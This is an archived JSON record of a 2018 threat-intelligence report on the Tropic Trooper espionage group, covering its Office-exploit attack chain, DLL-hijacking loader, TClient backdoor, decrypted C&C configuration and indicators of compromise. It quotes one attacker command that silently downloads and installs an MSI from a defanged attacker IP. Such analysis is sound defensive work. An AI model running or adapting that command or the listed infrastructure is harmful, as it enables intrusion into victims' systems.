{
	"id": "cfda91f2-8dd2-46c9-b96c-3d5dcc9cab28",
	"created_at": "2026-04-06T00:15:01.817523Z",
	"updated_at": "2026-04-10T03:33:20.01381Z",
	"deleted_at": null,
	"sha1_hash": "528d8f38f83904dc5732ed358917cb599d26a8d5",
	"title": "Tropic Trooper’s New Strategy",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 90526,
	"plain_text": "Tropic Trooper’s New Strategy\r\nPublished: 2018-03-14 · Archived: 2026-04-02 11:10:04 UTC\r\nTropic Trooper (also known as KeyBoy) levels its campaigns against Taiwanese, Philippine, and Hong\r\nKong targets, focusing on their government, healthcare, transportation, and high-tech industries. Its operators are\r\nbelieved to be very organized and develop their own cyberespionage tools that they fine-tuned in their recent\r\ncampaigns. Many of the tools they use now feature new behaviors, including a change in the way they maintain a\r\nfoothold in the targeted network.\r\nAttack Chain\r\nFigure 1. Attack chain of Tropic Trooper’s operations\r\nHere’s a summary of the attack chain of Tropic Trooper’s recent campaigns:\r\n1. Execute a command through exploits for CVE-2017-11882 or CVE-2018-0802, security flaws in Microsoft\r\nOffice’s Equation Editor (EQNEDT32.EXE).\r\n2. Download an installer package (.msi) and install it on the system by executing the command: /c msiexec /q\r\n/i [hxxp://61[.]216[.]5[.]24/in.sys]).\r\n3. This system configuration file (in.sys) will drop a backdoor installer (UserInstall.exe) then delete itself.\r\nThe backdoor installer will drop a normal sidebar.exe file (a Windows Gadget tool, a feature already\r\ndiscontinued by Windows), a malicious loader (in \"C:\\ProgramData\\Apple\\Update\\wab32res.dll\"), and an\r\nencrypted configuration file. UserInstall.exe will abuse the BITSadmin command-line tool to create a job\r\nand launch sidebar.exe.\r\n4. The malicious loader will use dynamic-link library (DLL) hijacking — injecting malicious code into a\r\nprocess of a file/application — on sidebar.exe and launch dllhost.exe (a normal file). The loader will then\r\ninject a DLL backdoor into dllhost.exe.\r\nWe also observed malicious documents that don’t need to download anything from the internet as the backdoor’s\r\ndropper is already embedded in the document. 
This, however, doesn’t influence the overall result for the victim.\r\nThe backdoor will load the encrypted configuration file and decrypt it, then use Secure Sockets Layer (SSL)\r\nprotocol to connect to command-and-control (C\u0026C) servers.\r\nTropic Trooper uses exploit-laden Microsoft Office documents to deliver malware to targets. These documents use\r\njob vacancies in organizations that may be deemed socio-politically sensitive to recipients. Below is a screenshot\r\nof the document used in their latest campaigns:\r\nFigure 2. Malicious document used by Tropic Trooper\r\nPDB Strings as Context Clues\r\nThe MSI file has two program database (PDB) strings inside: one belonging to the MSI file, and another for the\r\nbackdoor installer (detected by Trend Micro as TROJ_TCDROP.ZTFB).\r\nhttps://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/\r\nPage 1 of 5\n\nFigure 3. PDB strings inside the MSI file\r\nThe first PDB string contains ss2/Projects/MsiWrapper (Project MsiWrapper), which we found to be an\r\nopen-source application that converts executable setup programs to MSI files. The second PDB string contains\r\nWork, House, and TSSL: we can assume this tool belongs to Tropic Trooper’s TSSL project as seen by other\r\nresearchers. This one is new, as seen in the misspelling of “Horse” as “House” (other reports had the string\r\ntyped correctly).\r\nAnother interesting PDB string we found is\r\nD:\\Work\\Project\\VS\\house\\Apple\\Apple_20180115\\Release\\InstallClient.pdb. At installation, the MSI file drops\r\nthree files and creates one hidden directory (UFile) into C:\\ProgramData\\Apple\\Update\\, likely as a ruse.\r\nIt would then use sidebar.exe to load the malicious wab32res.dll (TROJ_TCLT.ZDFB) through DLL hijacking.\r\nThis is carried out to evade antivirus (AV) detection, because wab32res.dll is loaded by a benign file.\r\nFigure 4. 
The installer drops three files into the Apple/Update directory\r\nFigure 5. PDB strings inside the loader file\r\nThe PDB string above shows that the attackers intended it to be a loader (hence the name FakeRun) and not the actual\r\nbackdoor. FakeRun’s PDB string (D:\\Work\\Project\\VS\\house\\Apple\\Apple_20180115\\Release\\FakeRun.pdb)\r\nindicates the loader will execute dllhost.exe and inject one malicious DLL file, which is the backdoor, into this\r\nprocess. The backdoor, TClient (BKDR_TCLT.ZDFB), is so named from its own PDB string.\r\nFigure 6. TClient is injected into dllhost.exe\r\nMalware Analysis\r\nwab32res.dll (FakeRun loader) loads TClient. Once the loader is executed, it checks whether the current process\r\nis sidebar.exe before proceeding. If the check succeeds, the loader executes the dllhost.exe process and\r\ncreates a hardcoded mutex to avoid injecting into the wrong dllhost.exe, as there can be multiple instances of it\r\ndepending on the number of programs using Internet Information Services.\r\nFigure 7. The loader checking the sidebar process\r\nFigure 8. The malicious loader injecting the backdoor into dllhost.exe\r\nFigure 9. Comparison of TClient’s configuration format in 2016 (left, from other researchers) and 2018\r\n(right)\r\nTClient will use SSL to connect to Tropic Trooper’s C\u0026C server. However, the C\u0026C server and some\r\nconfiguration values are not hardcoded in the backdoor. This allows Tropic Trooper’s operators to easily\r\nchange/update the C\u0026C server and configure other values.\r\nTClient is actually one of Tropic Trooper’s other backdoors. The backdoor noted by other security researchers was\r\nencoded with different algorithms and configured with different parameter names in 2016, for instance. 
TClient\r\nuses symmetric encryption to decrypt its configuration with one 16-byte key in 2018. The image and table below\r\nillustrate TClient’s encrypted configuration that we decrypted (via Python code):\r\nFigure 10. Snapshot of code we used to decrypt TClient’s configuration\r\nFigure 11. Encrypted backdoor configuration\r\nDescription: Decrypted string\r\nCheck code: MDDEFGEGETGIZ\r\nAddr1: tel.qpoe[.]com\r\nAddr2: elderscrolls.wikaba[.]com\r\nAddr3: tel.qpoe[.]com\r\nPort1: 443\r\nPort2: 443\r\nPort3: 53\r\nLoginPasswd: someone\r\nHostMark: mark\r\nProxy: 0\r\nFigure 12. Decrypted backdoor configuration\r\nReverse analysis of TClient allowed us to determine how to decrypt the C\u0026C information. TClient will use\r\ncustom SSL libraries to connect to the C\u0026C server. We also found another SSL certificate on this C\u0026C server. A\r\ncloser look reveals that it was registered quite recently, and is set to expire after a year, suggesting Tropic\r\nTrooper’s use or abuse of components or services that elapse so they can leave as few traces as possible.\r\nFigure 13. SSL certificate’s validity\r\nFollowing Tropic Trooper’s Trails\r\nWe further monitored their activities and found three additional and notable PDB strings in their malware:\r\nD:\\Work\\Project\\VS\\HSSL\\HSSL_Unicode_2\\Release\\ServiceClient.pdb\r\nD:\\Work\\VS\\Horse\\TSSL\\TSSL_v3.0\\TClient\\Release\\TClient.pdb\r\nD:\\Work\\VS\\Horse\\TSSL\\TSSL_v0.3.1_20170722\\TClient\\x64\\Release\\TClient.pdb\r\nThese came from open-intelligence platforms and incident response cases. 
These strings shed further light on\r\nTropic Trooper’s operations:\r\nThey have another campaign/project named HSSL, which supports Unicode characters.\r\nThe TSSL project has a v3.0 version, indicating the operators can mix and match different versions of their\r\nmalware, depending on their target.\r\nThe TSSL project has a 64-bit version.\r\nThe Need for a Proactive Incident Response Strategy\r\nCyberespionage campaigns are persistent and, as shown by Tropic Trooper, always raring to exploit weaknesses in\r\npeople and technology. For organizations, this highlights the significance of staying ahead of their attackers:\r\ndetect, analyze, and respond. What techniques will they use? How can my organization’s attack surface be\r\nreduced? What did I do to respond to the threat — what worked, what didn’t, and what could be fine-tuned?\r\nA proactive incident response strategy provides threat intelligence — from the endpoint to the network — that can\r\nlet IT/system administrators identify malicious activities that aren’t typically visible to traditional security\r\nsolutions.\r\nTClient, for instance, uses DLL hijacking and injection that may not be as noticeable to others. Its use of the SSL\r\nprotocol also means it can blend with legitimate traffic. Analyzing their PDB strings can also provide a deeper\r\ninsight into the campaign’s bigger picture. Ascertaining the tactics and techniques they use empowers organizations\r\nin developing robust and actionable indicators of compromise (IoCs) that can act as benchmarks for response.\r\nHere are some best practices that organizations can adopt:\r\nKeep the system, its applications, and the network updated. The vulnerabilities that Tropic Trooper’s\r\ncampaigns exploit were patched last January, for instance. 
Enforce a stronger patch management\r\npolicy, and consider virtual patching for legacy systems.\r\nEnforce the principle of least privilege: Employ network segmentation and data\r\ncategorization to deter lateral movement and mitigate further exposure. Application control and\r\nbehavior monitoring block suspicious files and anomalous routines from being installed or executed in the\r\nsystem.\r\nDisable or secure the use of system administration tools such as\r\nPowerShell and other command-line tools that may be abused.\r\nActively monitor your perimeter, from gateways and endpoints to networks and servers. Firewalls as well\r\nas intrusion detection and prevention systems help thwart network-based attacks.\r\nNurture a culture of cybersecurity. Spear-phishing emails, for instance, rely on baiting targets with socially\r\nengineered documents. The technologies that help protect the organization are only as good as the people\r\nwho use them.\r\nIndicators of Compromise (IoCs)\r\nRelated Hashes (SHA-256):\r\nURLs related to 
C\u0026C communication:\r\nqpoe[.]com\r\nwikaba[.]com\r\ntibetnews[.]today\r\ndns-stuff[.]com\r\n2waky[.]com\r\nSource: https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
	],
	"report_names": [
		"tropic-trooper-new-strategy"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "61ea51ed-a419-4b05-9241-5ab0dbba25fc",
			"created_at": "2023-01-06T13:46:38.354607Z",
			"updated_at": "2026-04-10T02:00:02.939761Z",
			"deleted_at": null,
			"main_name": "APT23",
			"aliases": [
				"BRONZE HOBART",
				"G0081",
				"Red Orthrus",
				"Earth Centaur",
				"PIRATE PANDA",
				"KeyBoy",
				"Tropic Trooper"
			],
			"source_name": "MISPGALAXY:APT23",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bef7800a-a08f-4e21-b65c-4279c851e572",
			"created_at": "2022-10-25T15:50:23.409336Z",
			"updated_at": "2026-04-10T02:00:05.319608Z",
			"deleted_at": null,
			"main_name": "Tropic Trooper",
			"aliases": [
				"Tropic Trooper",
				"Pirate Panda",
				"KeyBoy"
			],
			"source_name": "MITRE:Tropic Trooper",
			"tools": [
				"USBferry",
				"ShadowPad",
				"PoisonIvy",
				"BITSAdmin",
				"YAHOYAH",
				"KeyBoy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "578f8e62-2bb4-4ce4-a8b7-6c868fa29724",
			"created_at": "2022-10-25T16:07:24.344358Z",
			"updated_at": "2026-04-10T02:00:04.947834Z",
			"deleted_at": null,
			"main_name": "Tropic Trooper",
			"aliases": [
				"APT 23",
				"Bronze Hobart",
				"Earth Centaur",
				"G0081",
				"KeyBoy",
				"Operation Tropic Trooper",
				"Pirate Panda",
				"Tropic Trooper"
			],
			"source_name": "ETDA:Tropic Trooper",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"ByPassGodzilla",
				"CHINACHOPPER",
				"CREDRIVER",
				"China Chopper",
				"Chymine",
				"Darkmoon",
				"Gen:Trojan.Heur.PT",
				"KeyBoy",
				"Neo-reGeorg",
				"PCShare",
				"POISONPLUG.SHADOW",
				"Poison Ivy",
				"RoyalRoad",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Swor",
				"TSSL",
				"USBferry",
				"W32/Seeav",
				"Winsloader",
				"XShellGhost",
				"Yahoyah",
				"fscan",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "86182dd7-646c-49c5-91a6-4b62fd2119a7",
			"created_at": "2025-08-07T02:03:24.617638Z",
			"updated_at": "2026-04-10T02:00:03.738499Z",
			"deleted_at": null,
			"main_name": "BRONZE HOBART",
			"aliases": [
				"APT23",
				"Earth Centaur ",
				"KeyBoy ",
				"Pirate Panda ",
				"Red Orthrus ",
				"TA413 ",
				"Tropic Trooper "
			],
			"source_name": "Secureworks:BRONZE HOBART",
			"tools": [
				"Crowdoor",
				"DSNGInstaller",
				"KeyBoy",
				"LOWZERO",
				"Mofu",
				"Pfine",
				"Sepulcher",
				"Xiangoop Loader",
				"Yahaoyah"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434501,
	"ts_updated_at": 1775792000,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/528d8f38f83904dc5732ed358917cb599d26a8d5.pdf",
		"text": "https://archive.orkl.eu/528d8f38f83904dc5732ed358917cb599d26a8d5.txt",
		"img": "https://archive.orkl.eu/528d8f38f83904dc5732ed358917cb599d26a8d5.jpg"
	}
}